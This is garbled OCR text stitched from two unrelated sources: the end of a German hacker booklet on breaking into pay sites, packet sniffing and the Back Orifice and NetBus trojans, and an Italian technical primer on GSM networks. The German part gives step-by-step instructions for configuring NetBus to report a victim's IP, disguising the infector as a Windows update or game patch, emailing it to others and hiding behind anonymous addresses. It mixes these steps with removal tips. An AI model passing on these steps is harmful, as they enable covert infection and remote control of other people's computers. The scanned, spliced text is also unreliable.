entsprechend weiterbehandelt. In der Regel wird er nach erfolgreicher Zahlung zu einem 

Formular geschickt, mit dem die Login-Daten erzeugt werden. Das Neumitglied kann 

einen Usemamen und ein Passwort wahlen und erhàlt nach wahl derer sofortigen 

Zugang. Das Formular fiigt die Daten automatisch in die Passwort-Datei ein. Hier liegt 

jedoch ein oft gemachter Fehler: 

Geht man nach Erzeugung eines Usemame/Passwort-Paares einfach mittels des ,,Back"- 

Buttons des Browsers zuriick zum Formular, so kann man auf einfache und legale Weise 

ein weiteres Username/Passwort-Paar erzeugen und das immer wieder. 

Als Webmaster sollte man folgende zwei Schutzmechanismen einsetzen: 

* Das Kreditkarten-Unternehmen sollte nach erfolgreicher Priifung einen einmaligen 
PIN-Code iibermitteln, den man dann aus der liste der noch giiltigen PIN-Codes 


streicht und so das Formular zur Username/Passwort-Erzeugung bei jeder Zahlung 
nur genau EINMAL eingesetzt werden kann. Dieses Verfahren wird von den meisten 
Kreditkarten-Unternehmen auch als ,,One-Time PIN-Hardcoding" bezeichnet. 

* Das Script, daft die Usernamen/Passwérter erzeugt, sollte auch mittels der 
HTTP_REFERRER-Servervariablen iiberpriifen, ob der User auch vom 
Kreditkartenunternehmen kommt. Sonst kann ein 

gewiefter Hacker ein Script schreiben, das von seinem Rechner aus einfach solange 

verschiedene PIN-Nummem ausprobiert, bis es eine noch giiltige findet. Sind die PIN 

z.B. siebenstellig, so dauert es im statistischen Mittel nur 5000 Sekunden, bis man eine 

giiltige PIN findet, wenn das Script jede Sekunde eine PIN testet. Bei einer schnellen 

Intemetverbindung sind jedoch auch mehrere Tests pro Sekunde mòéglich! 


Bilder nicht in geschittzten Verzeichnissen 
Dieser Fehler ist einer der haufigsten, da er leicht iibersehen wird: 
Wie bereits erwahnt, sind mittels des HTACCESS-Schutzes immer das jeweilige 


Verzeichnis und alle Unterverzeichnisse geschiitzt. Befinden sich die Bilder der 
Mitgliederseiten jedoch in einem Verzeichnis, das nicht in dieser geschiitzten 
,»,Baumstruktur" enthalten ist, so kann dieses Verzeichnis und die Bilder darin ohne 
Eingabe von iisemame/Passwort angesehen werden. Besonders einfach ist es dann, wenn 
das Bilder-Verzeichnis auch nicht gegen auflisten geschiitzt ist. Dann geniigt das 
Eingeben des Pfades um alle Bilder aufzulisten. Diese Bilderverzeichnisse haben oft den 
Namen ,, Images" oder ,,gfx", pics", ,,pix", pictures", ,,pic", ,,graphics". Ein einfaches 
Durchprobieren mit etwas Phantasie fiihrt hier bereits oft zum Erfolg. 


Beispiel: 
|-|...-#root |..-#images 
|...-#members 


Das .htaccess-File liegt im Geschiitzten Verzeichnis "members". Dort liegen auch die 
HTML-Dokumente fiir die Mitglieder. Die dazugehòrigen Bilder liegen jedoch in 
diesem Beispiel im Verzeichnis "Images", welches nicht in der members-Hierarchie ist 
und somit nicht passwortgeschiitzt ist. Handelt es sich beispielsweise um 
www.pomnsite.com als root dieser Paysite, so kann im Browser einfach die URL 
wWww.pornsite.com/images eingegeben werden, und man erhélt eine Liste der 
gesammelten Bilder (vorrausgesetzt, das Directory-Browsing ist nicht serverseitig 
ausgeschaltet) 


Packet Sniffing 
Diese Mòéglichkeit ist etwas komplizierter als die anderen beschriebenen, denn es 


miissen einige Vorraussetzungen getroffen werden: Sie miissen in einem LAN (Ethemet- 
Netwerk) an einem Rechner sitzen und Root-Access haben. Dann kann man einen 
sogenannten ,,Packet-Sniffer" wie beispielsweise ,,SNOOP" einsetzen. Packet-Sniffer 
findet man meist als C-Sourcecode im Internet. Diese kurzen Sourcecodes muss man 
dann nur noch mittels gcc auf der UNIX-Shell compilieren und schon ist es méglich, die 
Pakete, die zu und von anderen Rechner im LAN gesendet werden, abzuhòren. Denn 
Ethernet-Netzwerke setzen die sogenannte ,,Broadcasf'-Technologie ein. Ein Paket, da 
fiir einen Rechner in einem LAN bestimmt ist, wird im Prinzip an alle Rechner im LAN 
ausgesandt. Packet-Sniffing ist also wiederum besonders in den Fallen gefahrlich, bei 
denen man bei einem Webspace-Provider seinen Webserver mietet und sich dort 
naturgemaf mit vielen anderen Kunden in einem LAN befindet. Ein Beispiel ist 
www.pair.com. einer der gròSSten kommerziellen Webspace-Provider in den USA. Dort 
befinden sich iber 70 Webserver in einem LAN, auf dem z.Zt. iiber 30.000 Kunden 
einen virtuellen Webserver betreiben! 


Als Schutz gegen Packet-Sniffing bietet sich der Einsatz eines ,,Segmented Networks" 
an. Bei einem solchen Netzwerk wird nicht die Boradcast-Technologie benutzt, sondern 
die Pakete werden direkt mittels Routing-Tabellen zu dem Ziel-Rechner geroutet. Eine 
besonders fiir Web-Server geeignete Lòsung ist der Einsatz von SSL (Secure Sockets 
Layer). Dies Protokoll verschliisselt alle Pakete, die somit zwar noch abgefangen werden 
kònnen, aber nicht mehr gelesen werden k6nnen. SSL wird von den meisten 
Webhosting-iintemehmen gegen geringen Aufpreis angeboten. SSL-Verschliisselte 
Webinhalte sind am Protokoll-Prefix ,,https://" zu erkennen. Zum Betrieb einer SSL- 
geschiitzten Website muf man eine SSL-ID haben, die es beispielsweise bei 
www.verisign.com gibt. Ein kleiner Nachteil ist jedoch, dab HTTPS-Verbindungen 


etwas langsamer sind als 
gewòhnliche HTTP-Verbindungen, da ein relativ hoher Verschliisselungs-Overhead 
existiert. 


Trojanische Pferde 
Back Orifice und NetBus 
Back Orifice 


Die amerikanische Hackergruppe Cult OfThe Dead Cow (http://www.cultdeadcow.com) 
veròffentlichte ein Programm mit dem Namen "Back Orifice", das sie als 
"Femwartungswerkzeug fiir Netzwerke" bezeichnet. Daft die Intention eine andere ist, 
ergibt sich schon aus dem Namen: Back Orifice (hintere Òffnung) ilbersetzt man hier am 
besten mit "Hintertiir", denn das Programm macht es fast zum Kinderspiel, Schindluder 
mit Windows-PCs zu treiben. Witzig die Anspielung auf MicroSchuft's "Back Office"- 
System. 

Das nur 124 KByte grofe "Server-Modul" laftt sich namlich an ein beliebiges Windows- 
EXE-Programm koppeln, um es nichtsahnenden Anwendern unterzuschieben. Wird die 
Datei unter Windows 95 oder 98 ausgefiihrt, klinkt sich der Server quasi unsichtbar im 
System ein. Von diesem Moment an wartet das trojanische Pferd nur noch darauf, iiber 
das UDP-Protokoll geweckt zu werden. 

Mit dem Client làft sich bequem auf den befallen Rechner zugreifen.Unter anderem 
kann man das Dateisystem manipulieren (Dateien runterladen, hochspielen etc.), Tasks 
beenden, uvm. Die Funktionsweise des Back Orifice ist schon aus anderen Hacker-Tools 
bekannt; neu ist in erster Linie der Bedienungskomfort der grafischen 
"Wartungskomponente" - wenige Eingaben und Mausklicks geniigen, um Prozesse zu 
beenden. Tastatureingaben zu protokollieren, die Windows-Registry zu manipulieren 
oder IP-Adressen umzuleiten. 

Finen interessanten Praxisbericht findet man unter der deutschen Adresse 
http://www.puk.de/BackOrifice/default.html oder 
http://www.bubis.com/glaser/backorifice.htm 

Um Ihr System auf ein vorhandenes Back-Office zu untersuchen, gibt es 


Programme wie BoDetect 
(http://www.spiritone.com/vcbenson/current_projects/backorifice/backorifice.htm) 


oder das Programm BORED 


(http://www.st-andrews.ac.uk/sjs/bored/bored.html) 

Es ist aber auch manuell sehr einfach. Back Orifice zu entfemen: 
Òffnen Sie die Registry (regeditexe ausriihren) und schauen unter dem 
Schliissel 


"HKEY_LQCAL_MACHINE\SOFTWARE\Microsoft\Windows\CuiTentVersion\RunServices" 
nach einem Eintrag mit dem Namen "<blank>.exe" (Defàult-Filename) bzw. 
mit einem Eintrag der Linge 124,928 (+/- 30 Bytes). Lòschen Sie diesen 


Eintrag; er bewirkt, da der "Back Orifice"-Server bei jedem Windows-Start 
automatisch aktiviert wird. 

Das Programm selbst liegt im allgemeinen im Verzeichnis 
"\Windows\System" und ist daran erkennbar, dal es kein Programm-Icon hat 
und eine Gròfe von 122 KByte (oder geringfiigig mehr) besitzt. Sollten Sie 
die Datei aus irgendwelchen Griinden nicht finden, kann es Ihnen helfen, daf 
verschiedene Informationen als ASCII-String im Prgramm-Code zu finden 
sind; so ist mit grofter Wahrscheinlichkeit die Zeichenkette 
"bofilemappingcon" enthalten, die Sie iiber Suche im Explorer finden 
werden. 

Zusatzlich zur "Back Orifice-Prgramm-Datei" wird im selben Verzeichnis 
noch die "WINDLL.DLL" zum mitloggen von Tastatureingaben installiert, 
die Sie auch sinnvoller Weise lòschen, die aber alleine keinen Schaden 
anrichten kann. 

Das Problem bei Back-Orifice ist, da es schwierig ist, die IP-Adresse des 
Hosts zu erkunden, da diese sich ja bei jedem Einwahlen des befallenen 
Rechners dndert. 

Dieses Problem gelòst und eine noch machtigere Lòsung geschaffen hat 
Carl-Fredrik Neikter mit seinem Programm "NetBus", welches recht ahnlich 
ist. Es bietet noch weitgehendere Funktionen und ist einfacher zu installieren. 
NetBus 

Nachdem Sie sich die entsprechende Datei herungergeladen haben, sollten 
Sie diese entpacken. Nun erhalten Sie drei Dateien: 

NETBUS.EXE, NETBUS.RTF und PATCH.EXE 

Bei PATCH.EXE handelt es sich um das gefàahrliche Infizierungsprogramm, 
das eigentliche Trojanische Pferd. Starten Sie diese Datei also nicht! Die 
Datei NETBUS.RTF enthalt eine kurze englische Anleitung des Authors. Die 
Datei NETBUS.EXE ist der ,,dient" mit dem Sie auf infizierte Server 
zugreifen kònnen. Diese kònnen Sie ohne Sorgen starten. Starten Sie zum 
Testen den Server auf Ihrem eigenen Rechner, indem Sie eine DOS- 
Eingabeaufforderung òffnen und im Verzeichnis von NetBus den Server mit 
dem Parameter ,,/noadd" starten, also 

PATCH.EXE /noadd [RETURN J 

Nun lauft der Server. Jetzt kònnen Sie den dient starten (NETBUS.EXE 
doppelclicken) und auf Ihren eigenen Rechner zugreifen. Wiahlen Sie dazu 


als Adresse ,,Jocalhost" oder ,,1 27.0.0. l". Wenn Sie den Server beenden 
wohlen, wahlen Sie im dient ,,Server Admin" und dann ,,dose Server". 
Auferdem kann das Infizierungsprogramm so gesndert werden, daft es die 
IP-Adresse automatisch an eine von Ihnen gewàahlt Email-Adresse schickt, 
sobald jemand mit einem von NetBus infizierten Rechner in das Internet 
geht. Dies ist der gewaltige Vorteil gegeniiber Back Orifice. Dazu wahlt man 
im NetBus-Client den Button "Server Setup" und gibt die entsprechenden 
Informationen ein. Schwierig ist es lediglich, einen freien Mail-Server zu 
finden, der Mails von jeder IP-Adresse akzeptiert. Dann wahlt man "Patch 
Srvr" und wahlt die zu patchende Infizierungsdatei (standardmafBig 
"patch.exe"). 

Wer versucht, einen anderen Rechner zu infizieren, kann die Datei 
PATCH.EXE nun einfach per Email an einen anderen Intemetnutzer 
schicken und die Datei als ,,Windows-Update" oder als irgendeine tolle 
lustige Animation bezeichnen. Die Datei kann dazu beliebig umbenannt 
werden (z.b. Win98update.exe oder siedler2 patch.exe 

etc.). Wird die Datei nun gestartet, passiert optisch garnichts. Jedoch hat sich der 
NetBus-Server bereits auf dem Rechner versteckt installiert und wird von nun an 
jedesmal automatisch gestartet, wenn der Rechner gebootet wird. 

Hat man obige Verinderungen am Infizierungsprogramm vorgenommen, bekommt man 
nun immer automatisch eine Email mit der IP-Adresse des infizierten Rechners, sobald 
dieser online ins Internet geht. Diese IP-Adresse kònnen Sie nun im NetBus-Client 
eingeben und den Rechner manipulieren. 

Hacker benutzen sicherheitshalber anonyme Email-Adressen, die es beispielsweise bei 
hotmail.com oder mail.com gibt. 

Um Ihr System zu schiitzen, empfiehlt sich Norton Antivirus 
http://www.symantec.de/region/de/avcenter/ welches neben NetBus auch Back Orifice 
erkennt. Sie kònnen auch wiederum manuell arbeiten. Der automatische NetBus-Start ist 
in der Registry unter 
"\HKEY_LOCAL_MACHINESOFTWARE\Microsoft\Windows\CurrentVersion\Run" 

eingetragen und sollte entfernt werden. Allerdings kann der Dateiname variieren 
(patch.exe, syseditexe oder explore.exe sind einige bekannte Namen) 

Weiterfiihrende Info finden Sie unter http://www.bubis.com/glaser/netbus.htm 

Tip des Autors 


Sollten Sie beabsichtigen, einen Passwortgeschiitzten Intemetservice zu betreiben, so 
kommen Sie nie auf die Idee, einen Microsoft NT-Webserver einzusetzen! Windows NT 
hat ein Sicherheitssystem, das mehr Lòcher hat, als ein Schweizer Kédse. Statt dessen 
sollten Sie ein Unix-System wahlen. Leider bieten deutsche Webspace-Provider 
gròBtenteils NT-Lòsungen an. Hier heift es also, Ausschau halten und ggf. konkret bei 
einem Webspace-Provider nach einem Unix-Server 

fragen! Ein wesentlicher Vorteil eines Unix-Servers ist neben der Sicherheit 
der Vorteil, da man sich dort auch per TELNET einloggen kann und so 
wesentlich mehr Kontroller iber den Server hat. Bei NT-Servem ist dies 
nicht méglich! Empfehlenswert und preiswert sind besonders unter BSDI 
oder Linux laufende Webserver. Wie jeder weil, ist Linux sogar kostenlos 
und Apache, einer der besten Webserver, ist ebenfalls kostenlos erhaltlich. 
Auferdem sollte man auch die Performance-Vorteile eines Unix-Systems 
nicht unterschétzen. Besonders im Bereich Traffic-starker Webangebote wird 
fast ausschliefslich inix eingesetzt. Sollten Sie also beispielsweise ein 
Erwachsenen-Angebot mit vielen tausend Bildern etc. planen, so lege ich 
Ihnen den Einsatz eines iinix-Server wàrmstens ans Herz. Eine interessante 
Website zum Thema ,, Unix vs. NT" findet sich unter http://www.lot- 


germany.com/magazin/unix-nt.htm ! 
**#*NACHWORT*** 


Das war das Buch, 30 DM dafiir auszugeben hatte sich net gelohnt, oder? 
CIAO @ all HackerZ 


new-hackerz@gmx.de 


BITLES 


Il sistema GSM 


Il sistema GSM e' stato attivato ufficialmente in Italia nel'ottobre 1992, gli apparati sono Ericsson, Siemens, 
Italtel. (Omnitel usa Nokia) 


Il GSM e' un sistema cellulare simile al TACS, ma mentre quest'ultimo e' analogico il sistema GSM e' 

digitale, alcuni dei vantaggi del GSM sono: 
possibilita' di effettuare e ricevere chiamate all'estero dove il sistema e' attivo. 

-  Segretezza delle informazioni (non e' possibili ascoltare le chiamate) 

- Trasmissione dati 

- Il numero abbonato e altri numeri per l'identificazione non risiedono nel telefono come nel tacs, bensi' in 
una carta chiamata SIM (Subscriber Identity Module) 

- migliore qualita' della conversazione (ricostruzione dati persi) 

-  capacita' di traffico molto piu' ampie di quelle tacs 

- molti servizi aggiuntivi (non elencati per ora) 


Gli svantaggi sono dovuti alla gestione del sistema che e' molto piu' complessa di quella tacs, problemi di 
interferenza dovuti alla ripetizione dei cluster (gruppi di frequenze che identificano una serie di celle), poche 
frequenze disponibili, problemi ancora tra apparati di case costruttrici diverse, l'area di copertura di una cella 
ridotta al massimo a 35 chilometri, ecc. 


Struttura fisica del sistema mooolto riassunta e' la seguente: 


MSC (Mobile Services Switching Centre) 
+------- . —------ + 
cli BSC (Base Station Controller) 
+------- ! —------ + +------- + 
BTS + BIS BIS 50 (Base Transceiver Station) 


Diverse radio basi (BTS) sono collegate ad un unico BSC che ha il compito di gestire handover, power control 
ed altre funzioni; diversi BSC sono collegati ad un unico MSC che gestisce, tra le altre, il collegamento tra la 
rete GSM e la rete pubblica. 

MSC e' collegato a database che gestiscono le informazioni degli abbonati che 'entrano nell'area' (VLR Visitor 
Location Register) o che si sono registrati nell'area (HLR Home.... che contiene inoltre informazioni relative 
all'abbonamento) 

Un telefono (MS) che si sposta in comunicazione tra un'area di copertura ed un'altra effettua un 'handover', 
il livello dell'handover puo' essere tra due BTS dello stesso BSC o tra due con BSC diverse, o tra due MSC; in 
quest'ultimo caso esistono ancora problemi (cadute). 

A Livello logico una serie di radio basi vengono raggruppate sotto un'unica area chiamata LA (Location 
Area). Ogni singola cella ha un nome univoco in tutto il sistema GSM esistente; la cella si identifica attaverso 
il CGI (Cell Global Identity) che contiene l'identificativo della nazione, rete, LA e numero cella. In ogni istante 
si conosce la posizione di ogni telefono presente sulla rete; il telefono in fase di accensione e di spegnimento 
si registra nella rete (vedremo poi come). 


alcuni fra i termini tecnici piu' ricorrenti: 


- dle telefono acceso in 'ascolto' 

- dedicated telefono in conversazione 

-  assignment occupazione del canale voce, inizio conversazione 

-  handover passaggio tra due BTS in fase di conversazione 

- release rilascio di una conversazione 

- location upd. in fase di accensione vengono inviate informazioni alla rete relative all'abbonamento. 
- power control la BTS dice al MS con quale potenza deve accedere nella sua area di copertura, 


questo limita il consumo delle batterie e crea minori interferenze 
- SMS short msg sono messaggi che gli utenti si possono scambiare senza attivare la conversazione 
- freq. hopping e' la possibilita' di 'saltare' da un canale all'altro all'interno di una singola cella 


Il sistema GSM 


DATI TECNICI 

Il sistema GSM e' un sistema cellulare, cioe' logicamente suddiviso in celle; di solito una cella e' composta da 
tre gruppi antenne messi 120 gradi l'uno dall'altro (3 BTS), ogni antenna e' composta da 2 RX che sono le 
piu' esterne per il diversity e una centrale TX (2 se esiste anche il tacs sullo stesso traliccio). 

Una serie di celle che contengano tutte le frequenze disponibili formano un cluster; i cluster si ripetono, per 
cui le frequenze vengono ripetute su tutto il territorio. Ogni singola BTS puo' trasmettere su piu' frequenze 
(vedremo in seguito) 

Ogni frequenza GSM ha una larghezza di banda di 200 KHz suddivisa logicamente in 8 parti, cioe' e' in grado 
di gestire 8 conversazioni contemporaneamente. La larghezza di banda viene sfruttata per trasmettere delle 
informazioni in pacchetti (frame), ogni frame contiene informazioni relative alle 8 call. La frame di base cioe' 
quella piu' piccola si chiama burst, e' composta da 142 bit + 14.25 bit di inizio/fine per un totale di 156.25 
bits. La durata di ogni singola frame e' di 0.577 ms. Esistono vari tipi di burst, di correzione, di 
sincronizzazione, di accesso ecc; 51 burst formano frame di 235 msec che e' la configurazione standard; 
frame dello stesso tipo vengono raggruppate per creare le informazioni che circolano in ogni singolo canale 
logico del GSM. 


51 burst formano una multiframe 
26 multiframe formano una superframe 
2048 superframe formano una hyperframe 


890-915 MHz range usato da MS per Tx 
935-960 MHz range usato da MS per Rx 
numero di frequenze : 124 

numero di call = 124*8 


Ogni singolo burst o frame viene chiamato TDMA burst o frame, questo perche' contiene informazioni 
relative alle 8 call suddivise per divisione di tempo (TDMA Time Division Multiple Access) 

In ogni stato del telefono (idle, dedicated ecc), il MS sa che tipo di informazioni andare a prendere dalle 
frames generali; queste informazioni relative ad un singolo stato del MS vengono raggruppate sottoforma di 
canali GSM. 


--Esistono canali di traffico (TCH) 


--Esistono canali di controllo (BCCH Broadcast Control Channel) 
SCH = Sync channel 
BCCH = broadcast, informazioni generali sulla BTS 


--Esistono canali di controllo comune (CCCH) 

PCH = paging channel 

RACH = random access channel, usato per richiedere accesso 
AGCH = Access Grant..., usato per accedere all'SDDCH 


--Esistono canali di controllo dedicati (DCCH) 

SDCCH = Stand Alone Ded. Control Channel, usato durante una call setup 
SACCH = Slow Associated ... (misure inviate dal telefono) 

FACCH = Fast Associated ... usato per alte velocita' 


La BTS invia al telefono il ritardo o l'anticipo con cui puo' accedere alle informazioni che circolano nelle frame 
(TA Time Advance) Il TA va da 1 a 63 che corrisponde a circa 35 Km di distanza dalla BTS; ogni valore indica 
i bit di ritardo con cui il MS deve accedere alla frame. 

In centrale esiste un parametro collegato al TA che se modificato limita la dimensione della cella; e' il valore 
massimo a cui TA puo' arrivare (TALIM) raggiunto il limite viene richiesto un handover incondizionato al 
telefono. 


Il sistema GSM 


Abbiamo visto che col range di frequenze 900 MHz disponibili otteniamo 124 frequenze utilizzate dal 
sistema; ogni frequenza ha 8 TS per cui 124*8 chiamate effettuabili contemporaneamente (in realta' sono 
meno) 


Ogni radio base, che chiamiamo BTS e' una cella, un sito e' invece composto da 2 o 3 BTS; per essere chiari: 
quando si vedono in giro tralicci con 3 gruppi di 3 o 4 antenne direttive, quello e' un sito composto da 3 
radio basi o BTS e la copertura e' pari a 3 celle. A volte si identifica col nome cella l'insieme delle 3 celle 
formate da un sito. 

Ogni BTS ha la possibilita' di gestire piu' di una frequenza chiamate portanti, TI ne ha almeno 2 per radio 
base, in Grecia ne hanno anche 6 per radio base; se ampliamo il discorso a molti altri siti, si puo' capire 
quale lavoro di pianificazione di copertura e di assegnamento di frequenze esista dietro il sistema cellulare 
GSM. Se poi si riscontrano interferenze e, quindi, la variazione di alcune frequenze in uno o piu' siti, si 
devono ripianificare tutte le frequenze dei cluster adiacenti. 


ESEMPIO: ipotizziamo una BTS con 2 portanti 

portante 1 : 8 timeslot (da 0 a 7) 01234567 detta portante BCCH 
portante 2 : 8 timeslot (da 0a 7) 01234567 detta 1 portante TCH 
portante 3 : 8 timeslot (da 0a 7) 01234567 detta2 portante TCH 


In teoria la BTS in questione puo' gestire 24 conversazioni contemporaneamente in realta' gestisce 22 
conversazioni perche' il TS 0 della portante BCCH e' dedicato al canale di controllo BCCH, il TS 1 della 
portante BCCH e' dedicato al canale SDCCH. 


Vediamo i 5 canali piu' significativi del sistema GSM: 
BCCH Canale di controllo sempre presente in idle mode; porta informazioni relative alla cella servente 
ed alle celle adiacenti: CGI (identificativo cella), TKPWR potenza che deve avere il telefono per accedere 
alla cella, DTX se trasmissione discontinua attiva ed altre info minori. 

-  PCHCanale di paging, riporta tutti i telefoni che stanno ricevendo chiamate, se il telefono si accorge di 
essere presente nella lista si attiva la progedura di paging. 

-  SDCCH Attentificazioni e registrazioni dei vari telefoni. 

- TCH Canale di traffico che trasporta tra le altre le informazioni della conversazione cioe' le parole 
crittografate. 

-  SACCH Canale per scambio messaggi, misure di campo, Time Advance ecc. 


DESCRIZIONE CONCETTI GENERALI (Le varie procedure verranno descritte successivamente). 


ROAMING (solo in idle mode) 

Quando un telefono (MS) si sposta da una cella a cui e' connesso nell'area di copertura di un'altra cella, il 
telefono stesso decide di cambiare la frequenza (senza per questo avvisare la radio base). Questo e' il 
ROAMING. Il MS e' in continua misura delle celle adicenti che gli vengono inviate dalla BTS attraverso il 
canale BCCH. La procedura viene anche detta RESELECTION 


CAMBIO LOCATION AREA 

Il telefono monitorizza sempre durante lo stato di idle mode il canale BCCH, quando si accorge di essere 
passato su celle che hanno un identificativo dell'area diverso da quello che lui aveva in precedenza viene 
effettuata una procedura chiamata LOCATION UPDATING. 


REGISTRAZIONE 

Questa registrazione viene fatta per aggiornare i database connessi all'MSC di appartenenza, viene effettuata 
una procedura di rilascio con la vecchia stazione (detta IMSI detach) e una registrazione presso la nuova 
(IMSI attach). Esiste la possibilita' di imporre al telefono una procedura di registrazione periodica es. ogni 30 
minuti; se non si ricevono informazioni dal MS durante questo periodo, l'MSC si impone una procedura di 
detach. 


PAGING 

Il telefono monitorizza sempre in idle mode il canale di paging; se si accorge che e' in arrivo una chiamata 
per lui parte la procedura di assegnamento del canale voce (chiamata). Il messaggio di paging non cambia 
all'interno di una stessa area. 


Il sistema GSM 


ASSEGNAMENTO 
Quando inizo una telefonata sia fatta dal MS che ricevuta, si attiva una procedura di assegnamento del 
canale voce detta ASSIGNEMENT 


HANDOVER 

Detto in parole povere e' la procedura di ROAMING effettuata in conversazione La conversazione passa su 
un'altra portante di un'altra BTS; non e' detto che venga mantenuto lo stesso timeslot. Viene attivata la 
procedura omonima. 


INTRACELL HANDOVER 
Dopo aver effettuato l'assegnamento del canale voce, e' possibile un nuovo assegnamento su un'altra 
portante della stessa cella. Se la BTS ha solo una portante, viene cambiato timeslot. 


FREQUENCY HOPPING 

Durante una conversazione puo' accadere di fare un HANDOVER; se il sistema gestisce il freq. hopping, 
l'handover puo' essere effettuato su un'altra portante della stessa BTS; il timeslot rimane lo stesso anche 
dopo l'avvenuto handover. Attualmente il sistema non lo gestisce. 


RELEASE 
E' la chiusura della conversazione. Viene attivata la procedura omonima. 


DISCONTINUOUS TRANSMISSION 

E' la trasmissione discontinua; il MS in comunicazione puo' comporre delle frame complete di informazioni 
sulla codifica della voce anche se tra gli utenti non vengono scambiate parole; questo occupa inutilmente il 
canale voce. La trasmissione discontinua durante una 'pausa' nella conversazione permette al MS di 
comporre delle frame di dimensioni ridotte. 

Nel sistema GSM gestito da TI e' attiva la trasmissione discontinua. 


POWER CONTROL 

la BTS dice al MS in conversazione con quale potenza deve accedere nella sua area di copertura, questo 
limita il consumo delle batterie e crea minori interferenze. Questa informazione viene inviata ogni 480 
millisec. 


TRASMISSIONE DATI 

La strasmissione dati e' a tutti gli effetti una conversazione tra due utenti, viene impiegato lo stesso canale 
voce; la differenza e' che viene abilitata una 'porta' (SAPI) dedicata alla trasmissione dati diversa da quella 
attivata per una conversazione normale. 


Di seguito vengono spiegate le principali procedure radio tra MS e BTS suddivise in stati, ogni stato e' 
composto da diversi messaggi che non verranno spiegati. 


E' fondamentale, pero', spiegare alcuni concetti: 

Lo scambio di informazioni avviene su due livelli di messaggi; il primo chiamato LAYER 2 porta informazioni 
piu' a basso livello, alcune delle quali inerenti la struttura della frame inviata o ricevuta. Il secondo tipo di 
messaggio si chiama LAYER 3 e porta le informazioni sia dal MS alla BTS (detto UPLOAD), sia dalla BTS al 
MS (detto DOWNLOAD) 


Il LAYER 2, inoltre, puo' contenere al suo interno il messaggio di livello 3; sara' compito della BTS o MS 
scompattare il messaggio per elaborare il LAYER 3. 


LAYER 2 UP MS -> BTS (puo' contenere un LAYER 3 UP) 
LAYER 2 DOWN BTS -> MS (puo' contenere un LAYER 3 DOWN) 
LAYER 3 UP MS -> BTS 

LAYER 3 DOWN BTS -> MS 


Tutti i messaggi sono binari, noi riusciamo a leggerli in un formato stabilito dalle raccomandazioni GSM solo 
perche' la BTS o MS li scompattano. A livello radio non abbiamo accesso a tutte le informazioni, quello che 
stabilisce I'MSC o il BSC non lo possiamo vedere; possiamo solo sapere se le varie procedure sono state 
accettate (in alcune procedure e' implicita la decisione del BSC o MSC, vedi handover completato o altro). 


Il sistema GSM 


La stessa presenza o meno del LAYER 2 o 3 nella sequenza dei messaggi in una qualsiasi procedura indica se 
si sta svolgendo correttamente oppure no. 


Le raccomandazioni GSM dividono una procedura in tre fasi: 

1. RR CONNECTION connessione radio stabilita (composta da vari messaggi a seconda del tipo di 
procedura) RR sta per radio resource 

2. MM CONNECTION connessione di livello 2 stabilita (cioe'se tra MS e BTS esiste realmente uno scambio 
di informazioni) MM sta per mobility menagment 

3. EVENTO passata la fase RR e MM viene identificata la procedura 


A qualsiasi livello puo' esserci un failure. 


IDLE (IL TELEFONO NON E' IN CONVERSAZIONE) 

Questa non e' una procedura; e' uno stato del telefono. Il telefono analizza il canale di paging per vedere se 
una chiamata e' in arrivo; contemporaneamente vengono inviate al telefono informazioni relative alle celle 
adiacenti. 


LOCATION UPDATING 
Questa procedura viene attivata durante l'accensione del telefono oppure quando si passa da un'area di 
copertura (Location Area) ad un'altra 


1- il telefono e' nello stato di idle 

2- UP viene richiesto un canale (channel request) 

3- DOWN viene assegnato (non realmente ancora) un canale (immediate assignment) 
4- UP viene attivata la procedura location updating (request) (stabilito IMSI) 

5- connessione a livello 2 

6- DOWN location updating accettata o reject 

7-. UP scollegamento richiesto (channel release) 

8- il telefono e' nello stato di idle 


ASSEGNAMENTO - INIZIO CONVERSAZIONE MS -> BTS 

1- il telefono e' nello stato di idle 

2- UP viene richiesto un canale (channel request) 

3- DOWN viene assegnato (non realmente ancora) un canale (immediate assignment) 
4- connessione a livello 2 

5- viene stabilita l'identita' del telefono IMEI e algoritmo di codifica 

6- se tutto e' andato bene in DOWN viene confermato il servizio (CM service) 

7-. viene emesso un record di informazioni (setup) che contiene anche il numero del telefono da chiamare 
8- DOWN la radio base conferma l'assegnamento del canale voce 

9- UP il telefono conferma assegnamento del canale voce 

10- connessione a livello 2 per controllare connessione 

11- sono in conversazione 


ASSEGNAMENTO - INIZIO CONVERSAZIONE BTS -> MS 

1- il telefono e' nello stato di idle 

2- DOWN arriva un paging per il telefono 

3- UP viene richiesto un canale (channel request) 

4- DOWN viene assegnato (non realmente ancora) un canale (immediate assignment) 
5- connessione a livello 2 

6- viene stabilita l'identita' del telefono IMEI e algoritmo di codifica 

7-. se tutto e' andato bene in DOWN viene confermato il servizio (CM service) 

8- viene emesso un record di informazioni (setup) che contiene anche il numero del telefono da chiamare 
9- DOWN la radio base conferma l'assegnamento del canale voce 

10- UP il telefono conferma assegnamento del canale voce 

11- connessione a livello 2 per controllare connessione 

12- il telefono squilla 
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DEDICATED (CONVERSAZIONE) 

Questa non e' una procedura; e' uno stato del telefono. 

Ogni 480 millisec. il telefono manda in UP le misure delle celle adiacenti, TA, TxPower, canale, bsic, timeslot, 
livello, qualita' (Bit Error Rate) ecc. 

la BTS invia sempre con la stessa tempistica informazioni relative al segnale ed alla cella ricevuta, CGI, 
Power Control, Tipo di trasmissione ecc; in piu' la BTS invia il valore di due contatori chiamati rlink; il primo 
indica sempre il valore massimo del contatore impostato in centrale; il secondo viene decrementato di una 
unita' se in UP il messaggio non e' stato correttamente decodificato, mentre viene incrementato di due unita' 
fino al valore massimo se il messaggio in UP viene codificato. 

Il secondo contatore detto ‘current rlink counter' se raggiunge il valore 0 fa cadere la conversazione. 


HANDOVER 

1- il telefono e' in conversazione (dedicated mode) 

2- la BTS si accorge che uno dei criteri per handover (qualita' cattiva, segnale debole, distanza dalla BTS 
che supera i limiti impostati in centrale ecc) si e' verificato, di conseguenza comanda al telefono di 
effettuare handover (handover command DOWN) 

3- UP il telefono converma la ricezione del comando 

4- UP il telefono invia il messaggio di handover completato o fallito 

5- Connessione a livello 2 con la nuova cella se handover completo oppure con la vecchia cella se handover 
fallito. Se la connessione a livello 2 con la nuova cella fallisce, si tenta la connessione con la vecchia 
cella; se la connessione con la vecchia cella fallisce, cade la conversazione 

6- il telefono continua la conversazione sulla nuova cella oppure rimane sulla vecchia se l'handover e' fallito 

RELEASE RICHIESTA DA MS (chiamante che chiude non Microsoft!) 

1- il telefono e' in conversazione (dedicated mode) 

2- UP messaggio di disconnect dal telefono 

3- DOWN messaggio di release 

4- UP il telefono invia release completata 

5- DOWN viene inviato comando di channel release 

6- UP il telefono conferma abbandono di canale (disconnect) 

